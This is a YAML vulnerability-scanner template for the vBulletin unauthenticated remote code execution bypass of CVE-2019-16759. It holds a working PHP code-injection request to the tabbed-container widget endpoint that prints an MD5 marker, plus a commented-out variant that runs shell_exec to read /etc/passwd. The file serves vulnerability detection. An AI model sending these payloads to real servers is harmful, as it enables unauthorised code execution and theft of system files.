id: php-vbulletin-rce-bypass
info:
  name: vBulletin Unauthenticated RCE Bypass for CVE-2019-16759
  risk: Critical

params:
  - root: "{{.BaseURL}}"

requests:
  # - method: POST
  #   redirect: false
  #   url: >-
  #     {{.root}}/ajax/render/widget_tabbedcontainer_tab_panel
  #   headers:
  #     - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
  #     - Content-Type: application/x-www-form-urlencoded
  #   body: |
  #     subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("cat%20/etc/passwd");exit;
  #   detections:
  #     - >-
  #       StatusCode() == 200 && StringSearch('body', 'root:') && StringSearch('body', '/bin/bash') && !StringSearch('body', 'Citrix Login')

  - method: POST
    redirect: false
    url: >-
      {{.root}}/ajax/render/widget_tabbedcontainer_tab_panel
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: |
      subWidgets[0][template]=widget_php&subWidgets[0][config][code]=print(md5(13373311));exit(); 
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', 'cc3edd8a98f001e6e8d3032221ed5425')

reference:
  - link: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
